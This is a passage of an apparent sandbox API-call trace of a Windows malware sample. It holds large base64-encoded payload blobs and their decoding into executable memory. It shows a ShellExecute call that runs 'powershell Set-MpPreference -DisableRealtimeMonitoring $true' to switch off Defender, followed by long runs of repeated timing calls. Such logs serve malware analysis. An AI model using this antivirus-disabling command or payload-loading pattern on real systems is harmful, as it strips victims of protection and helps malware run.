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", cchString=0x13ec, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x12fef8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x12fef8, pdwSkip=0x0, pdwFlags=0x0) returned 1
	[0054.239] CryptStringToBinaryA (in: pszString="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kYSpNZLf4rWrsm+D1/KSx4ZU+erPqMqrWpbO4bOQulKH6Y6Hq8BvvdOCqqWvS5LI17utvmz+/O3BkIRW89HgrrSrTanA6b+Tx3mSutOFqcpUnNX2qrKQRZTE0saGqz+p/unLq6VQjdGNkbqtQaq9uKrAkHuQsJakr7RUi+qGrL6TOL/R+5GEqTSS35W1q7Jvg9eHkseGVPnqvKjKq1qWzpyzkLpSh+nxh6vAb73T/6qlr0uSyKS7rb5s/vyYwZCEVvPRl660q02pwJy/k8d5krqghanKVJzVm6qykEWUxL3Ghqs/qf6Ey6ulUI3RnpG6rUGqva2qwJB7kLCBpK+0VIvqk6y+kzi/0eiRhKk1kt+Itauyb4PXmJLHhlT56qGoyqtals6Ps5C6Uofp5IerwG+90+iqpa9Lksixu62+bP78i8GQhFbz0bqutKtNqcCzv5PHeZK6jYWpylSc1aiqspBFlMSIxoarW6n+s8urpYWN0auRuq3rqr2eqsCQypCwvKSvtPKL6qysvpM7v9HVkYSpLZLfu7Wrsv2D162Sx4ZX+eqWqMqr8JbOurOQumOH6deHq8BBvdPFqqWvA5LInrutvif+/KbBkIQz89GprrSrbanApr+Tx+CSupqFqcqZnNW9qrKQg5TEm8aGqzOp/q7Lq6VFjdG0kbqtTaq9g6rAkMSQsK+kr7Rqi+q5rL6Tx7/RwpGEqU2S3661q7L6g9e+kseGM/nqe6nKq+uWzlWykLomh+k6hqvANL3TNqulryuSyGu6rb5t/vxRwJCEVvPRXK+0q02pwFW+k8d5krpnhKnKVJzVQquykEWUxGbHhqs/qf5dyqulUI3RQZC6rUGqvXSrwJB7kLBapa+0VIvqSq2+kzi/0S+QhKk1kt9BtKuyb4PXU5PHhlT56mipyqtals5AspC6UofpLYarwG+90yOrpa9Lksh4uq2+bP78TMCQhFbz0UOvtKtNqcBIvpPHeZK6dISpylSc1VerspBFlMRxx4arP6n+SMqrpVCN0VKQuq1Bqr1Zq8CQe5CwdaWvtFSL6metvpM4v9EckISpNZLfdLSrsm+D12STx4ZU+epdqcqrWpbOc7KQulKH6RCGq8BvvdMcq6WvS5LIRbqtvmz+/H/AkIRW89F2r7SrTanAf76Tx3mSukGEqcpUnNVkq7KQRZTEXMeGqz+p/mfKq6VQjdF/kLqtQaq9SqvAkHuQsGClr7RUi+pwrb6TOL/RCZCEqTWS32e0q7Jvg9d5k8eGVPnqQqnKq1qWzm6ykLpSh+kDhqvAb73TCaulr0uSyFK6rb5s/vxqwJCEVvPRZa+0q02pwBK+k8d5krouhKnKVJzVCauykEWUxC/Hhqs/qT7+NJIf+UmSCMVFlATHOL8Rk269E5g8nBXlVIsq6lKHKYh5knre35Bw5lqWDudNqQDmTqp9zFr5Ks1b8xHtXI0R9WSDF/hm/jzuNqk+7T2SH+xMkgjSQ5QE0j2/EYBrvRP1V5wVilaLKodThyn7eZJ6q3uQcJFnlg6S+KkAlaCqfbEP+SqycfMRkEONEYZZgxeNBf48maSpPphjkh+f4pIIvxeUBL2gvxHtNL0T5v2cFZ9DiyqQdocp7mSSerhhkHCMcZYOjdGpAIimqn2iYfkqp2rzEYeZjRGTuYMXno3+PLToqT63RZIfsoeSCIw1lASIrL8R2gS9E9PEnBWshIsqrSyHKdHrknqFVZBwvwaWDrjNqQC/mqp9l7H5KpR78xGqMI0RvBqDF7Nu/jynP6j+CsqrpVBLVE0FRThABjgTVLLqJ6nKqwqvHsjIrzBkK2RSeD4/BXvbuAilr7QFsjrZ14EZGBFUP2+LPDQ+WjpL2dgzuq2+PscsyLqvDlEGlLNGSlRNqMBav5PHeVQ/b/bTPaqlrxs+TQVFOnVtOHnZsn+FqcoF0cUXq7KQF60UzL25IThcu7/VVFpQjNGRkrqtQWw4eb8w5P6KyKul04tVxOqZr76Ts/SIwpCEbXhYJ0zAAUFE0I68k8fy0eOShKm+GVLaH0Wy5xFX9Yfy8hEzqT9TgVTRHUfXjG7M35mRx4a/MOTujsirpdOJVcT6na++k7vEjMKQhGhIWdHVk6mykIMWRNg5ko/4KodWNVRal85Ys5C6HkFsOPQZwz4RVr7BUq60qx/kwF6/k8cp2XLHKt2gCKWvtAayOuXXgRk8SpTUR/ATId9SAcABWT3OF1E8Unk+PgV73XioC68e8MivMFZyrNN87D5ve1a+sQeTh5iBo4meFOfU+rg3PC0BpcTKwNvE3f/VwtH8qOnEV+ksWzXEysDbxN3/1cLR/KjpxK//68alxMrA28Td/9XC0fyo6cSv/+vGpcQy2AVZTYdfUkFssTysV5XwYjU80h5GVKVnRVJB5X2FvYpve1Zg37YDHQMcC7pncWw4eQy0L3fdfVjRQcAVfQVH2Txkbym8ZG97VrCULlTAnqaIzhNZPLMhaDys8A5NDApTk98Gc84BYedjXVf3bKtV7d9oCBtXvQVErTRgbpF3P2970/UgUtOJUM6sR7miNAurMrR8urQ3V5BTSg0SMR7ZpDH6cVRq5JcHZgZpmXiPfr3OF0nmKPmeX2yhh9ZXH0DBXMmmpbxyrLM0WAS2D1d1DgEJwLEQrUlSyikw8hnH5nPdYFjRFbfdTzAbCcqJZbqY86O3mvmYlpyHmIE=", cchString=0x13ec, dwFlags=0x1, pbBinary=0x1273d8c, pcbBinary=0x12fef8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x1273d8c, pcbBinary=0x12fef8, pdwSkip=0x0, pdwFlags=0x0) returned 1
	[0054.239] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0
	[0054.239] LoadLibraryW (lpLibFileName="Crypt32.dll") returned 0x75610000
	[0054.239] GetProcAddress (hModule=0x75610000, lpProcName="CryptStringToBinaryA") returned 0x75645d77
	[0054.239] CryptStringToBinaryA (in: pszString="D9un1aHrRVJB4X2hBLIirwfdnltQS9eJZ4MXpWz+PNRUqT7XUJIf0jmSCOwrlAToXb8RugO9E7NnnBXMZosqzXyHKbEdknrlF5Bw3zaWDthNqQDmL6p9zCD5Ks0y8xHtPI0R9QODF/hC/jzuW6k+7VmSH+wnkgjSRZQE+G6/EaoGvROjJpwV3CCLKt0nhymhGJJ69ReQcM8blg7IIakAzy2qfec7+SrkNfMR+lCNEYkCgxeECf48klKpPpFWkh+YO5IIpjyUBKY49AG/PYQD4d0fvMYR+T+6B5XlfYnZcvsq3WC4CK8ejMQqmd8EqGjyGc8+hAPt3R+wwAFF5hCSyin48hk3bDNqvBmWOgs8TX9FUso59PIWbz8RVsoBhtkO5MYiiTTKPT4f3WrH8BP5W+0YX98Yo8gWS3SxPPgw2Db+Xp1yUwb4ZiJN2wyQC6sytjqPvTky0RW/Ms6vRDTIKcx243KbdOFg/GGaNhNC2ACmKqwQ8hmT5C9XJd3PLLSrsuTALr6TxylbiCKPPfx80QXn3whnRhZLeGh243KbEJ8d3w/8wBH9bAFYTTzHLLS8q3e9lN8XnMqVzW9FUsghqPIB8+Q+5jYWctkOhLI6ldmkMfu1mPOjt5r5mJach5iBOs6+woAwKgJo/+vGpcTKwNvE3f/VwtH8UP8DMm/rxqXEysDbxN3/1cLR/KjpxK//68alxMrA28Td/9XC0fyo6cSv/+s+vRpXUKNOTW9F2wSUUIPfC28T3ntZWrhDVE1vzBe9hY15VD868LpmAg0BL6t4X0VSQTSzOVi0J3fdJN8bYCFWxhJNBRGEY3lUP+q7IjHfkLus3wx3FdkZUDu632cXIwY2jNEbV98eT84JZW/weoQ8t/BkbQRZoCFVshpJBKlPOHlUuq8PXraWXtOIVqaMHWGTCrNqld1teJw2VQMPFQ/GihiQSWxt8rhuPCll/GeBY5nfCGfPQsGmWHqO7ox4EyXeUtSCtKNchdkMYAOgID4vIQ1s378NiVhN5ABayiHA8Fy0OnfdcKjTUhQKFuSgD4Kg9LWY86O3mvmYlpw=", cchString=0x42c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x12fef0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x12fef0, pdwSkip=0x0, pdwFlags=0x0) returned 1
	[0054.239] CryptStringToBinaryA (in: pszString="D9un1aHrRVJB4X2hBLIirwfdnltQS9eJZ4MXpWz+PNRUqT7XUJIf0jmSCOwrlAToXb8RugO9E7NnnBXMZosqzXyHKbEdknrlF5Bw3zaWDthNqQDmL6p9zCD5Ks0y8xHtPI0R9QODF/hC/jzuW6k+7VmSH+wnkgjSRZQE+G6/EaoGvROjJpwV3CCLKt0nhymhGJJ69ReQcM8blg7IIakAzy2qfec7+SrkNfMR+lCNEYkCgxeECf48klKpPpFWkh+YO5IIpjyUBKY49AG/PYQD4d0fvMYR+T+6B5XlfYnZcvsq3WC4CK8ejMQqmd8EqGjyGc8+hAPt3R+wwAFF5hCSyin48hk3bDNqvBmWOgs8TX9FUso59PIWbz8RVsoBhtkO5MYiiTTKPT4f3WrH8BP5W+0YX98Yo8gWS3SxPPgw2Db+Xp1yUwb4ZiJN2wyQC6sytjqPvTky0RW/Ms6vRDTIKcx243KbdOFg/GGaNhNC2ACmKqwQ8hmT5C9XJd3PLLSrsuTALr6TxylbiCKPPfx80QXn3whnRhZLeGh243KbEJ8d3w/8wBH9bAFYTTzHLLS8q3e9lN8XnMqVzW9FUsghqPIB8+Q+5jYWctkOhLI6ldmkMfu1mPOjt5r5mJach5iBOs6+woAwKgJo/+vGpcTKwNvE3f/VwtH8UP8DMm/rxqXEysDbxN3/1cLR/KjpxK//68alxMrA28Td/9XC0fyo6cSv/+s+vRpXUKNOTW9F2wSUUIPfC28T3ntZWrhDVE1vzBe9hY15VD868LpmAg0BL6t4X0VSQTSzOVi0J3fdJN8bYCFWxhJNBRGEY3lUP+q7IjHfkLus3wx3FdkZUDu632cXIwY2jNEbV98eT84JZW/weoQ8t/BkbQRZoCFVshpJBKlPOHlUuq8PXraWXtOIVqaMHWGTCrNqld1teJw2VQMPFQ/GihiQSWxt8rhuPCll/GeBY5nfCGfPQsGmWHqO7ox4EyXeUtSCtKNchdkMYAOgID4vIQ1s378NiVhN5ABayiHA8Fy0OnfdcKjTUhQKFuSgD4Kg9LWY86O3mvmYlpw=", cchString=0x42c, dwFlags=0x1, pbBinary=0x1274c84, pcbBinary=0x12fef0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x1274c84, pcbBinary=0x12fef0, pdwSkip=0x0, pdwFlags=0x0) returned 1
	[0054.239] VirtualAlloc (lpAddress=0x0, dwSize=0x1410, flAllocationType=0x1000, flProtect=0x40) returned 0x390000
	[0054.240] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76b10000
	[0054.240] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x774c0000
	[0054.341] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75bb0000
	[0054.344] GetProcAddress (hModule=0x76b10000, lpProcName="Wow64EnableWow64FsRedirection") returned 0x76b98bc9
	[0054.344] GetProcAddress (hModule=0x774c0000, lpProcName="RegCloseKey") returned 0x774d469d
	[0054.344] GetProcAddress (hModule=0x774c0000, lpProcName="RegCreateKeyW") returned 0x774d1514
	[0054.344] GetProcAddress (hModule=0x774c0000, lpProcName="RegOpenKeyExW") returned 0x774d468d
	[0054.344] GetProcAddress (hModule=0x774c0000, lpProcName="RegSetValueExW") returned 0x774d14d6
	[0054.344] GetProcAddress (hModule=0x75bb0000, lpProcName="ShellExecuteA") returned 0x75df7078
	[0054.345] Wow64EnableWow64FsRedirection (Wow64FsEnableRedirection=0) returned 0
	[0054.345] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/c powershell Set-MpPreference -DisableRealtimeMonitoring $true", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0054.399] GetKeyState (nVirtKey=144) returned 1
	[0054.399] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0054.399] GetAsyncKeyState (vKey=37) returned 0
	[0054.399] GetAsyncKeyState (vKey=39) returned 0
	[0054.399] GetAsyncKeyState (vKey=32) returned 0
	[0054.399] GetAsyncKeyState (vKey=13) returned 0
	[0054.399] GetAsyncKeyState (vKey=100) returned 0
	[0054.399] GetAsyncKeyState (vKey=102) returned 0
	[0054.399] GetAsyncKeyState (vKey=107) returned 0
	[0054.399] GetAsyncKeyState (vKey=109) returned 0
	[0054.399] GetTickCount () returned 0xa6628c
	[0054.399] GetTickCount () returned 0xa6628c
	[0054.399] GetTickCount () returned 0xa6628c
	[0054.399] GetTickCount () returned 0xa6628c
	[0054.399] GetTickCount () returned 0xa6628c
	[0054.399] GetTickCount () returned 0xa6628c
	[0054.399] GetTickCount () returned 0xa6628c
	[0054.399] GetTickCount () returned 0xa6628c
	[0054.399] GetTickCount () returned 0xa6628c
	[0054.399] GetTickCount () returned 0xa6628c
	[0054.399] GetTickCount () returned 0xa6628c
	[0054.399] GetTickCount () returned 0xa6628c
	[0054.399] GetTickCount () returned 0xa6628c
	[0054.399] GetTickCount () returned 0xa6628c
	[0054.399] GetTickCount () returned 0xa6628c
	[0054.399] GetTickCount () returned 0xa6628c
	[0054.399] GetTickCount () returned 0xa6628c
	[0054.399] GetTickCount () returned 0xa6628c
	[0054.399] GetTickCount () returned 0xa6628c
	[0054.399] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.400] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
